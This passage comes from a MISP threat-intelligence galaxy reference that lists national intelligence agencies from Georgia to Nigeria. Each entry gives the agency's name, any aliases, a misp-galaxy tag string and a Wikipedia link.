The tag is: misp-galaxy:intelligence-agency="Georgian Intelligence Service"

Georgian Intelligence Service is also known as:

  • საქართველოს დაზვერვის სამსახური

Table 1759. Table References

Links

https://en.wikipedia.org/wiki/Georgian_Intelligence_Service

Military Intelligence Department

Military Intelligence Department

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Department"

Bundesnachrichtendienst

Bundesnachrichtendienst (BND): Federal Intelligence Service

The tag is: misp-galaxy:intelligence-agency="Bundesnachrichtendienst"

Bundesnachrichtendienst is also known as:

  • Federal Intelligence Service

Table 1760. Table References

Links

https://en.wikipedia.org/wiki/Bundesnachrichtendienst

Bundesamt für Verfassungsschutz

Bundesamt für Verfassungsschutz (BfV): Federal Office for the Protection of the Constitution

The tag is: misp-galaxy:intelligence-agency="Bundesamt für Verfassungsschutz"

Bundesamt für Verfassungsschutz is also known as:

  • Federal Office for the Protection of the Constitution

Table 1761. Table References

Links

https://en.wikipedia.org/wiki/Bundesamt_f%C3%BCr_Verfassungsschutz

Federal Office for Information Security

Bundesamt für Sicherheit in der Informationstechnik (BSI): Federal Office for Information Security

The tag is: misp-galaxy:intelligence-agency="Federal Office for Information Security"

Table 1762. Table References

Links

https://en.wikipedia.org/wiki/Federal_Office_for_Information_Security

Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology

Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology

The tag is: misp-galaxy:intelligence-agency="Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology"

Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology is also known as:

  • Center for information and communication technology

Militärischer Abschirmdienst

Militärischer Abschirmdienst (MAD): Military Counterintelligence Service

The tag is: misp-galaxy:intelligence-agency="Militärischer Abschirmdienst"

Militärischer Abschirmdienst is also known as:

  • Military Counterintelligence Service

Table 1763. Table References

Links

https://en.wikipedia.org/wiki/Milit%C3%A4rischer_Abschirmdienst

State Authority for the Protection of the Constitution

Landesamt für Verfassungsschutz (LfV): (semi-independent) State Authority for the Protection of the Constitution for every single state

The tag is: misp-galaxy:intelligence-agency="State Authority for the Protection of the Constitution"

Table 1764. Table References

Links

https://en.wikipedia.org/wiki/State_Authority_for_the_Protection_of_the_Constitution

Bureau of National Investigations

Bureau of National Investigations (BNI) – (Internal Intelligence Agency)

The tag is: misp-galaxy:intelligence-agency="Bureau of National Investigations"

Table 1765. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_National_Investigations

National Intelligence Service (Greece)

National Intelligence Service (ΕΥΠ) – Εθνική Υπηρεσία Πληροφοριών

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Greece)"

National Intelligence Service (Greece) is also known as:

  • Εθνική Υπηρεσία Πληροφοριών

Table 1766. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Greece)

E Division – Intelligence Division

E Division – Intelligence Division

The tag is: misp-galaxy:intelligence-agency="E Division – Intelligence Division"

National Intelligence and Security Agency (NISA)[6][7][8][9]

National Intelligence and Security Agency (NISA)[6][7][8][9]

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Agency (NISA)[6][7][8][9]"

Table 1767. Table References

Links

https://en.wikipedia.org#cite_note-6

Service d’Intelligence National

Service d’Intelligence National (SIN) (National Intelligence Service)

The tag is: misp-galaxy:intelligence-agency="Service d’Intelligence National"

Table 1768. Table References

Links

https://en.wikipedia.org/wiki/Service_d%27Intelligence_National

Információs Hivatal

Információs Hivatal (IH) (Information Office)

The tag is: misp-galaxy:intelligence-agency="Információs Hivatal"

Table 1769. Table References

Links

https://en.wikipedia.org/wiki/Inform%C3%A1ci%C3%B3s_Hivatal

Nemzetbiztonsági Hivatal

Alkotmányvédelmi Hivatal (AH) (Constitution Protection Office)

The tag is: misp-galaxy:intelligence-agency="Nemzetbiztonsági Hivatal"

Table 1770. Table References

Links

https://en.wikipedia.org/wiki/Nemzetbiztons%C3%A1gi_Hivatal

Terrorelhárítási Központ

Terrorelhárítási Központ (TEK) (Counter Terrorism Centre)

The tag is: misp-galaxy:intelligence-agency="Terrorelhárítási Központ"

Table 1771. Table References

Links

https://en.wikipedia.org/wiki/Terrorelh%C3%A1r%C3%ADt%C3%A1si_K%C3%B6zpont

Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)

Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)

The tag is: misp-galaxy:intelligence-agency="Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)"

Nemzeti Információs Központ (NIK) (National Information Center)

Nemzeti Információs Központ (NIK) (National Information Center)

The tag is: misp-galaxy:intelligence-agency="Nemzeti Információs Központ (NIK) (National Information Center)"

Icelandic Police

The National Police Commissioner’s Analysis Unit – Greiningardeild Ríkislögreglustjóra (GRLS)

The tag is: misp-galaxy:intelligence-agency="Icelandic Police"

Table 1772. Table References

Links

https://en.wikipedia.org/wiki/Icelandic_Police#The_Icelandic_Intelligence_Service

Icelandic Crisis Response Unit

Icelandic Defense Agency’s Analysis Unit – Greiningardeild Varnarmálastofnunar Íslands (GVMSÍ) (Defunct)

The tag is: misp-galaxy:intelligence-agency="Icelandic Crisis Response Unit"

Table 1773. Table References

Links

https://en.wikipedia.org/wiki/Icelandic_Crisis_Response_Unit#Intelligence_gathering

Research and Analysis Wing

Research and Analysis Wing (R&AW)

The tag is: misp-galaxy:intelligence-agency="Research and Analysis Wing"

Table 1774. Table References

Links

https://en.wikipedia.org/wiki/Research_and_Analysis_Wing

Intelligence Bureau (India)

Intelligence Bureau (IB)

The tag is: misp-galaxy:intelligence-agency="Intelligence Bureau (India)"

Table 1775. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Bureau_(India)

National Investigation Agency

National Investigation Agency[10]

The tag is: misp-galaxy:intelligence-agency="National Investigation Agency"

Table 1776. Table References

Links

https://en.wikipedia.org/wiki/National_Investigation_Agency

National Technical Research Organisation

National Technical Research Organisation (NTRO)[10]

The tag is: misp-galaxy:intelligence-agency="National Technical Research Organisation"

Table 1777. Table References

Links

https://en.wikipedia.org/wiki/National_Technical_Research_Organisation

Directorate of Revenue Intelligence

Directorate of Revenue Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Revenue Intelligence"

Table 1778. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Revenue_Intelligence

Ministry of Finance (India)

Economic Intelligence Council

The tag is: misp-galaxy:intelligence-agency="Ministry of Finance (India)"

Table 1779. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Finance_(India)

Enforcement Directorate

Enforcement Directorate

The tag is: misp-galaxy:intelligence-agency="Enforcement Directorate"

Table 1780. Table References

Links

https://en.wikipedia.org/wiki/Enforcement_Directorate

Directorate General of GST Intelligence

Directorate General of GST Intelligence (DGGI)[11]

The tag is: misp-galaxy:intelligence-agency="Directorate General of GST Intelligence"

Table 1781. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_GST_Intelligence

Indian Army

Directorate of Military Intelligence

The tag is: misp-galaxy:intelligence-agency="Indian Army"

Table 1782. Table References

Links

https://en.wikipedia.org/wiki/Indian_Army

Directorate of Air Intelligence (India)

Directorate of Air Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Air Intelligence (India)"

Table 1783. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Air_Intelligence_(India)

Directorate of Naval Intelligence (India)

Directorate of Naval Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Naval Intelligence (India)"

Table 1784. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Naval_Intelligence_(India)

Joint Cipher Bureau

Joint Cipher Bureau

The tag is: misp-galaxy:intelligence-agency="Joint Cipher Bureau"

Table 1785. Table References

Links

https://en.wikipedia.org/wiki/Joint_Cipher_Bureau

State Intelligence Agency (Indonesia)

State Intelligence Agency (BIN) – Badan Intelijen Negara

The tag is: misp-galaxy:intelligence-agency="State Intelligence Agency (Indonesia)"

State Intelligence Agency (Indonesia) is also known as:

  • Badan Intelijen Negara

Table 1786. Table References

Links

https://en.wikipedia.org/wiki/State_Intelligence_Agency_(Indonesia)

Indonesian Strategic Intelligence Agency

Indonesian Strategic Intelligence Agency (BAIS) – Badan Intelijen Strategis Tentara Nasional Indonesia

The tag is: misp-galaxy:intelligence-agency="Indonesian Strategic Intelligence Agency"

Indonesian Strategic Intelligence Agency is also known as:

  • Badan Intelijen Strategis Tentara Nasional Indonesia

Table 1787. Table References

Links

https://en.wikipedia.org/wiki/Indonesian_Strategic_Intelligence_Agency

Indonesian Army Intelligence Centre

Indonesian Army Intelligence Centre (PUSINTELAD) – Pusat Intelijen Tentara Nasional Indonesia Angkatan Darat

The tag is: misp-galaxy:intelligence-agency="Indonesian Army Intelligence Centre"

Indonesian Army Intelligence Centre is also known as:

  • Pusat Intelijen Tentara Nasional Indonesia Angkatan Darat

Table 1788. Table References

Links

https://en.wikipedia.org/wiki/Indonesian_Army_Intelligence_Centre

National Cyber and Crypto Agency

National Cyber and Crypto Agency (BSSN) – Badan Siber dan Sandi Negara

The tag is: misp-galaxy:intelligence-agency="National Cyber and Crypto Agency"

National Cyber and Crypto Agency is also known as:

  • Badan Siber dan Sandi Negara

Table 1789. Table References

Links

https://en.wikipedia.org/wiki/National_Cyber_and_Crypto_Agency

Attorney General’s Office of Indonesia

Deputy Attorney General on Intelligence (Under the Attorney General’s Office) – Jaksa Agung Muda Bidang Intelijen Kejaksaan Agung

The tag is: misp-galaxy:intelligence-agency="Attorney General’s Office of Indonesia"

Attorney General’s Office of Indonesia is also known as:

  • Jaksa Agung Muda Bidang Intelijen Kejaksaan Agung

Table 1790. Table References

Links

https://en.wikipedia.org/wiki/Attorney_General%27s_Office_of_Indonesia

Directorate General of Immigration (Indonesia)

Directorate of Immigration Intelligence – Direktorat Intelijen Imigrasi

The tag is: misp-galaxy:intelligence-agency="Directorate General of Immigration (Indonesia)"

Directorate General of Immigration (Indonesia) is also known as:

  • Direktorat Intelijen Imigrasi

Table 1791. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Immigration_(Indonesia)

National Anti-Narcotics Agency (Indonesia)

National Narcotics Agency Intelligence Section – Seksi Intelijen Badan Narkotika Nasional

The tag is: misp-galaxy:intelligence-agency="National Anti-Narcotics Agency (Indonesia)"

National Anti-Narcotics Agency (Indonesia) is also known as:

  • Seksi Intelijen Badan Narkotika Nasional

Table 1792. Table References

Links

https://en.wikipedia.org/wiki/National_Anti-Narcotics_Agency_(Indonesia)

id:Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

Indonesian National Police Intelligence and Security Agency - Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

The tag is: misp-galaxy:intelligence-agency="id:Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia"

id:Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia is also known as:

  • Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia

Table 1793. Table References

Links

https://en.wikipedia.orghttps://id.wikipedia.org/wiki/Badan_Intelijen_dan_Keamanan_Kepolisian_Negara_Republik_Indonesia

Directorate General of Customs and Excise (Indonesia)

Customs & Excise Sub-Directorate of Intelligence – Sub-Direktorat Intelijen Direktorat Jenderal Bea Cukai

The tag is: misp-galaxy:intelligence-agency="Directorate General of Customs and Excise (Indonesia)"

Directorate General of Customs and Excise (Indonesia) is also known as:

  • Sub-Direktorat Intelijen Direktorat Jenderal Bea Cukai

Table 1794. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Customs_and_Excise_(Indonesia)

Indonesian Financial Transaction Reports and Analysis Center

Indonesian Financial Transaction Reports and Analysis Center (PPATK) – Pusat Pelaporan dan Analisis Transaksi Keuangan

The tag is: misp-galaxy:intelligence-agency="Indonesian Financial Transaction Reports and Analysis Center"

Indonesian Financial Transaction Reports and Analysis Center is also known as:

  • Pusat Pelaporan dan Analisis Transaksi Keuangan

Table 1795. Table References

Links

https://en.wikipedia.org/wiki/Indonesian_Financial_Transaction_Reports_and_Analysis_Center

Ministry of Intelligence (Iran)

Ministry of Intelligence (VAJA)

The tag is: misp-galaxy:intelligence-agency="Ministry of Intelligence (Iran)"

Table 1796. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Intelligence_(Iran)

Oghab 2

Oghab 2 – Nuclear facilities security

The tag is: misp-galaxy:intelligence-agency="Oghab 2"

Table 1797. Table References

Links

https://en.wikipedia.org/wiki/Oghab_2

Council for Intelligence Coordination

Council for Intelligence Coordination

The tag is: misp-galaxy:intelligence-agency="Council for Intelligence Coordination"

Table 1798. Table References

Links

https://en.wikipedia.org/wiki/Council_for_Intelligence_Coordination

Intelligence Protection Organization of Islamic Republic of Iran Army

Intelligence Protection Organization of Iranian Army (SAHEFAJA)

The tag is: misp-galaxy:intelligence-agency="Intelligence Protection Organization of Islamic Republic of Iran Army"

Table 1799. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Protection_Organization_of_Islamic_Republic_of_Iran_Army

Intelligence Organization of Army of the Guardians of the Islamic Revolution

Intelligence Organization of IRGC

The tag is: misp-galaxy:intelligence-agency="Intelligence Organization of Army of the Guardians of the Islamic Revolution"

Table 1800. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Organization_of_Army_of_the_Guardians_of_the_Islamic_Revolution

Intelligence Protection Organization of Army of the Guardians of the Islamic Revolution

Intelligence Protection Organization of IRGC (SAHEFASA)

The tag is: misp-galaxy:intelligence-agency="Intelligence Protection Organization of Army of the Guardians of the Islamic Revolution"

Table 1801. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Protection_Organization_of_Army_of_the_Guardians_of_the_Islamic_Revolution

Intelligence org of FARAJA

Intelligence org of FARAJA

The tag is: misp-galaxy:intelligence-agency="Intelligence org of FARAJA"

Intelligence org of the Islamic Republic of Iran[12]

Intelligence org of the Islamic Republic of Iran[12]

The tag is: misp-galaxy:intelligence-agency="Intelligence org of the Islamic Republic of Iran[12]"

Table 1802. Table References

Links

https://en.wikipedia.org#cite_note-12

General Security Directorate (Iraq)

General Security Directorate - (GSD) - (Internal security agency)

The tag is: misp-galaxy:intelligence-agency="General Security Directorate (Iraq)"

Table 1803. Table References

Links

https://en.wikipedia.org/wiki/General_Security_Directorate_(Iraq)

Iraqi National Intelligence Service

Iraqi National Intelligence Service - (INIS) - (Foreign intelligence and Special operations)

The tag is: misp-galaxy:intelligence-agency="Iraqi National Intelligence Service"

Table 1804. Table References

Links

https://en.wikipedia.org/wiki/Iraqi_National_Intelligence_Service

Falcons Intelligence Cell

Falcons Intelligence Cell - (FIC) - (Military intelligence)

The tag is: misp-galaxy:intelligence-agency="Falcons Intelligence Cell"

Table 1805. Table References

Links

https://en.wikipedia.org/wiki/Falcons_Intelligence_Cell

Kurdistan Region Security Council

Kurdistan Region Security Council (KRSC) - (Regional security agency)

The tag is: misp-galaxy:intelligence-agency="Kurdistan Region Security Council"

Table 1806. Table References

Links

https://en.wikipedia.org/wiki/Kurdistan_Region_Security_Council

Intelligence and Counter-Terrorism Directorate - Ministry of Interior

Intelligence and Counter-Terrorism Directorate - Ministry of Interior

The tag is: misp-galaxy:intelligence-agency="Intelligence and Counter-Terrorism Directorate - Ministry of Interior"

Directorate of Military Intelligence (Ireland)

Directorate of Military Intelligence (G2)

The tag is: misp-galaxy:intelligence-agency="Directorate of Military Intelligence (Ireland)"

Table 1807. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Military_Intelligence_(Ireland)

CIS Corps (Ireland)

Communications and Information Services Corps (CIS) SIGINT Section

The tag is: misp-galaxy:intelligence-agency="CIS Corps (Ireland)"

Table 1808. Table References

Links

https://en.wikipedia.org/wiki/CIS_Corps_(Ireland)

Special Detective Unit

Special Detective Unit (SDU)

The tag is: misp-galaxy:intelligence-agency="Special Detective Unit"

Table 1809. Table References

Links

https://en.wikipedia.org/wiki/Special_Detective_Unit

Garda National Surveillance Unit

National Surveillance Unit (NSU)

The tag is: misp-galaxy:intelligence-agency="Garda National Surveillance Unit"

Table 1810. Table References

Links

https://en.wikipedia.org/wiki/Garda_National_Surveillance_Unit

National Economic Crime Bureau

Financial Intelligence Unit (FIU)

The tag is: misp-galaxy:intelligence-agency="National Economic Crime Bureau"

Table 1811. Table References

Links

https://en.wikipedia.org/wiki/National_Economic_Crime_Bureau

Mossad

Mossad (Foreign Intelligence and Special Operations)

The tag is: misp-galaxy:intelligence-agency="Mossad"

Table 1812. Table References

Links

https://en.wikipedia.org/wiki/Mossad

Shin Bet

Shin Bet (Internal Security Service)

The tag is: misp-galaxy:intelligence-agency="Shin Bet"

Table 1813. Table References

Links

https://en.wikipedia.org/wiki/Shin_Bet

Military Intelligence Directorate (Israel)

Aman (Military intelligence)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Directorate (Israel)"

Table 1814. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Directorate_(Israel)

Lahav 433

Lahav 433 (Police intelligence)

The tag is: misp-galaxy:intelligence-agency="Lahav 433"

Table 1815. Table References

Links

https://en.wikipedia.org/wiki/Lahav_433

Agenzia Informazioni e Sicurezza Interna

Agenzia Informazioni e Sicurezza Interna (AISI) - Agency for Internal Information and Security

The tag is: misp-galaxy:intelligence-agency="Agenzia Informazioni e Sicurezza Interna"

Table 1816. Table References

Links

https://en.wikipedia.org/wiki/Agenzia_Informazioni_e_Sicurezza_Interna

Agenzia Informazioni e Sicurezza Esterna

Agenzia Informazioni e Sicurezza Esterna (AISE) - Agency for External Information and Security

The tag is: misp-galaxy:intelligence-agency="Agenzia Informazioni e Sicurezza Esterna"

Table 1817. Table References

Links

https://en.wikipedia.org/wiki/Agenzia_Informazioni_e_Sicurezza_Esterna

Centro Intelligence Interforze

Centro Intelligence Interforze (CII) - Joint Intelligence Center

The tag is: misp-galaxy:intelligence-agency="Centro Intelligence Interforze"

Table 1818. Table References

Links

https://en.wikipedia.org/wiki/Centro_Intelligence_Interforze

Financial Investigations Division (FID)[14]

Financial Investigations Division (FID)[14]

The tag is: misp-galaxy:intelligence-agency="Financial Investigations Division (FID)[14]"

Table 1819. Table References

Links

https://en.wikipedia.org#cite_note-14

Cabinet Intelligence and Research Office

Cabinet Intelligence and Research Office (CIRO)

The tag is: misp-galaxy:intelligence-agency="Cabinet Intelligence and Research Office"

Table 1820. Table References

Links

https://en.wikipedia.org/wiki/Cabinet_Intelligence_and_Research_Office

Defense Intelligence Headquarters

Defense Intelligence Headquarters (DIH)

The tag is: misp-galaxy:intelligence-agency="Defense Intelligence Headquarters"

Table 1821. Table References

Links

https://en.wikipedia.org/wiki/Defense_Intelligence_Headquarters

Public Security Intelligence Agency

Public Security Intelligence Agency (PSIA)

The tag is: misp-galaxy:intelligence-agency="Public Security Intelligence Agency"

Table 1822. Table References

Links

https://en.wikipedia.org/wiki/Public_Security_Intelligence_Agency

Dairat al-Mukhabarat al-Ammah

General Intelligence Department (GID) - (Da’irat al-Mukhabarat al-’Ammah)

The tag is: misp-galaxy:intelligence-agency="Dairat al-Mukhabarat al-Ammah"

Table 1823. Table References

Links

https://en.wikipedia.org/wiki/Dairat_al-Mukhabarat_al-Ammah

National Intelligence Service (Kenya)

National Intelligence Service(NIS)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Kenya)"

Table 1824. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Kenya)

Criminal Investigation Department (Kenya)

Directorate of Criminal Investigation(DCI)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigation Department (Kenya)"

Table 1825. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigation_Department_(Kenya)

Military Intelligence(MI)

Military Intelligence(MI)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence(MI)"

Table 1826. Table References

Links

https://en.wikipedia.orghttps://mod.go.ke/reports/cdf-opens-military-intelligence-corps-headquarters/

State Committee for National Security (Kyrgyzstan)

State Committee for National Security (UKMK/GKNB)

The tag is: misp-galaxy:intelligence-agency="State Committee for National Security (Kyrgyzstan)"

Table 1827. Table References

Links

https://en.wikipedia.org/wiki/State_Committee_for_National_Security_(Kyrgyzstan)

General Directorate of General Security

General Directorate of General Security

The tag is: misp-galaxy:intelligence-agency="General Directorate of General Security"

Table 1828. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_of_General_Security

The Information Branch

The Information Branch

The tag is: misp-galaxy:intelligence-agency="The Information Branch"

Table 1829. Table References

Links

https://en.wikipedia.org/wiki/The_Information_Branch

Lebanese State Security

Lebanese State Security

The tag is: misp-galaxy:intelligence-agency="Lebanese State Security"

Table 1830. Table References

Links

https://en.wikipedia.org/wiki/Lebanese_State_Security

National Security Agency (Liberia)

National Security Agency

The tag is: misp-galaxy:intelligence-agency="National Security Agency (Liberia)"

Table 1831. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency_(Liberia)

State Security Department of Lithuania

State Security Department - (Valstybes saugumo departamentas (VSD))

The tag is: misp-galaxy:intelligence-agency="State Security Department of Lithuania"

Table 1832. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Department_of_Lithuania

Second Investigation Department

Second Investigation Department - (Antrasis operatyvinių tarnybų departamentas (AOTD))

The tag is: misp-galaxy:intelligence-agency="Second Investigation Department"

Table 1833. Table References

Links

https://en.wikipedia.org/wiki/Second_Investigation_Department

Service de Renseignement de l’État

Luxembourg State Intelligence Service - (Service de Renseignement de l’État Luxembourgeois)

The tag is: misp-galaxy:intelligence-agency="Service de Renseignement de l’État"

Table 1834. Table References

Links

https://en.wikipedia.org/wiki/Service_de_Renseignement_de_l%E2%80%99%C3%89tat

Central Intelligence Service (CIS)[15]

Central Intelligence Service (CIS)[15]

The tag is: misp-galaxy:intelligence-agency="Central Intelligence Service (CIS)[15]"

Table 1835. Table References

Links

https://en.wikipedia.org#cite_note-15

Malaysian Defence Intelligence Organisation

Malaysian Defence Intelligence Organisation (Military Intelligence)[16]

The tag is: misp-galaxy:intelligence-agency="Malaysian Defence Intelligence Organisation"

Table 1836. Table References

Links

https://en.wikipedia.org/wiki/Malaysian_Defence_Intelligence_Organisation

Research Division of the Prime Minister’s Department

Malaysian External Intelligence Organisation (Foreign Intelligence)

The tag is: misp-galaxy:intelligence-agency="Research Division of the Prime Minister’s Department"

Table 1837. Table References

Links

https://en.wikipedia.org/wiki/Research_Division_of_the_Prime_Minister%27s_Department

Malaysian Special Branch

Malaysian Special Branch (Police & Internal Intelligence)[17]

The tag is: misp-galaxy:intelligence-agency="Malaysian Special Branch"

Table 1838. Table References

Links

https://en.wikipedia.org/wiki/Malaysian_Special_Branch

Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)

Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)

The tag is: misp-galaxy:intelligence-agency="Crime-Combat Planning, Analysis and Information Center (CENAPI / PGR – Centro de Planeación, Análisis e Información para el Combate a la Delincuencia)"

Assistant Attorney General’s Office for Special Investigations on Organized Crime

Assistant Attorney General’s Office for Special Investigations on Organized Crime (SEIDO / PGR)

The tag is: misp-galaxy:intelligence-agency="Assistant Attorney General’s Office for Special Investigations on Organized Crime"

Table 1839. Table References

Links

https://en.wikipedia.org/wiki/Assistant_Attorney_General%27s_Office_for_Special_Investigations_on_Organized_Crime

Federal Police (Mexico)

Intelligence Division of the Federal Police (Division de Inteligencia – CNS / Policia Federal)

The tag is: misp-galaxy:intelligence-agency="Federal Police (Mexico)"

Table 1840. Table References

Links

https://en.wikipedia.org/wiki/Federal_Police_(Mexico)#Intelligence_Division

National Intelligence Centre (México)

National Intelligence Centre (CNI)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Centre (México)"

Table 1841. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Centre_(M%C3%A9xico)

Estado Mayor Presidencial

2nd Section of the National Defense Intelligence Staff (SEDENA S-2 – Seccion 2da: Inteligencia del Estado Mayor)

The tag is: misp-galaxy:intelligence-agency="Estado Mayor Presidencial"

Table 1842. Table References

Links

https://en.wikipedia.org/wiki/Estado_Mayor_Presidencial

SEDENA

Military Intelligence – National Defense Ministry (Inteligencia Militar – SEDENA / Ejercito y Fuerza Aerea)

The tag is: misp-galaxy:intelligence-agency="SEDENA"

Table 1843. Table References

Links

https://en.wikipedia.org/wiki/SEDENA

Secretariat of the Navy

Naval Intelligence - (Inteligencia Naval / SEMAR / Marina Armada)

The tag is: misp-galaxy:intelligence-agency="Secretariat of the Navy"

Table 1844. Table References

Links

https://en.wikipedia.org/wiki/Secretariat_of_the_Navy

Information and Security Service of the Republic of Moldova

Information and Security Service (SIS)[18]

The tag is: misp-galaxy:intelligence-agency="Information and Security Service of the Republic of Moldova"

Table 1845. Table References

Links

https://en.wikipedia.org/wiki/Information_and_Security_Service_of_the_Republic_of_Moldova

General Intelligence Agency of Mongolia

General Intelligence Agency of Mongolia (GIA)

The tag is: misp-galaxy:intelligence-agency="General Intelligence Agency of Mongolia"

Table 1846. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_Agency_of_Mongolia

National Security Agency (Montenegro)

National Security Agency (ANB)

The tag is: misp-galaxy:intelligence-agency="National Security Agency (Montenegro)"

Table 1847. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency_(Montenegro)

General Directorate for Territorial Surveillance (Morocco)

General Directorate for Territorial Surveillance - Direction de la Surveillance du Territoire (DST)

The tag is: misp-galaxy:intelligence-agency="General Directorate for Territorial Surveillance (Morocco)"

Table 1848. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_for_Territorial_Surveillance_(Morocco)

Deuxième Bureau (Morocco)

Deuxième Bureau (Morocco) - Military secret service[19]

The tag is: misp-galaxy:intelligence-agency="Deuxième Bureau (Morocco)"

Table 1849. Table References

Links

https://en.wikipedia.org/wiki/Deuxi%C3%A8me_Bureau_(Morocco)

Direction Generale pour l’Etude et la Documentation

Directorate of Research and Documentation - Direction Generale pour l’Etude et la Documentation (DGED)

The tag is: misp-galaxy:intelligence-agency="Direction Generale pour l’Etude et la Documentation"

Table 1850. Table References

Links

https://en.wikipedia.org/wiki/Direction_Generale_pour_l%27Etude_et_la_Documentation

Office of the Chief of Military Security Affairs

Office of the Chief of Military Security Affairs (OCMSA)

The tag is: misp-galaxy:intelligence-agency="Office of the Chief of Military Security Affairs"

Table 1851. Table References

Links

https://en.wikipedia.org/wiki/Office_of_the_Chief_of_Military_Security_Affairs

Bureau Of Special Investigation

Bureau Of Special Investigation (BSI)

The tag is: misp-galaxy:intelligence-agency="Bureau Of Special Investigation"

Table 1852. Table References

Links

https://en.wikipedia.org/wiki/Bureau_Of_Special_Investigation

Special Intelligence Department

Special Intelligence Department (SID)

The tag is: misp-galaxy:intelligence-agency="Special Intelligence Department"

Table 1853. Table References

Links

https://en.wikipedia.org/wiki/Special_Intelligence_Department

Namibia Central Intelligence Service

Namibia Central Intelligence Service (NCIS)

The tag is: misp-galaxy:intelligence-agency="Namibia Central Intelligence Service"

Table 1854. Table References

Links

https://en.wikipedia.org/wiki/Namibia_Central_Intelligence_Service

Directorate of Military Intelligence, Nepal

Directorate of Military Intelligence (DMI)

The tag is: misp-galaxy:intelligence-agency="Directorate of Military Intelligence, Nepal"

Table 1855. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Military_Intelligence,_Nepal

National Investigation Department of Nepal

National Investigation Department (NID)

The tag is: misp-galaxy:intelligence-agency="National Investigation Department of Nepal"

Table 1856. Table References

Links

https://en.wikipedia.org/wiki/National_Investigation_Department_of_Nepal

General Intelligence and Security Service

General Intelligence and Security Service - Algemene Inlichtingen en Veiligheidsdienst (AIVD)

The tag is: misp-galaxy:intelligence-agency="General Intelligence and Security Service"

Table 1857. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_and_Security_Service

Joint Sigint Cyber Unit

Joint Sigint Cyber Unit (JSCU)

The tag is: misp-galaxy:intelligence-agency="Joint Sigint Cyber Unit"

Table 1858. Table References

Links

https://en.wikipedia.org/wiki/Joint_Sigint_Cyber_Unit

National Coordinator for Counterterrorism and Security

National Coordinator for Counterterrorism and Security - Nationaal Coördinator Terrorismebestrijding en Veiligheid (NCTV)

The tag is: misp-galaxy:intelligence-agency="National Coordinator for Counterterrorism and Security"

National Coordinator for Counterterrorism and Security is also known as:

  • Nationaal Coördinator Terrorismebestrijding en Veiligheid

Table 1859. Table References

Links

https://en.wikipedia.org/wiki/National_Coordinator_for_Counterterrorism_and_Security

Team Criminal Intelligence (KMar-TCI)

Team Criminal Intelligence (KMar-TCI)

The tag is: misp-galaxy:intelligence-agency="Team Criminal Intelligence (KMar-TCI)"

Team Criminal Intelligence (FIOD-TCI)

Team Criminal Intelligence (FIOD-TCI)

The tag is: misp-galaxy:intelligence-agency="Team Criminal Intelligence (FIOD-TCI)"

Government Communications Security Bureau

Government Communications Security Bureau[20]

The tag is: misp-galaxy:intelligence-agency="Government Communications Security Bureau"

Table 1860. Table References

Links

https://en.wikipedia.org/wiki/Government_Communications_Security_Bureau

New Zealand Security Intelligence Service

New Zealand Security Intelligence Service[20]

The tag is: misp-galaxy:intelligence-agency="New Zealand Security Intelligence Service"

Table 1861. Table References

Links

https://en.wikipedia.org/wiki/New_Zealand_Security_Intelligence_Service

National Assessments Bureau

National Assessments Bureau[20]

The tag is: misp-galaxy:intelligence-agency="National Assessments Bureau"

Table 1862. Table References

Links

https://en.wikipedia.org/wiki/National_Assessments_Bureau

National Intelligence Agency (Nigeria)

National Intelligence Agency (Foreign Intelligence and Counterintelligence)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Agency (Nigeria)"

Table 1863. Table References

Links

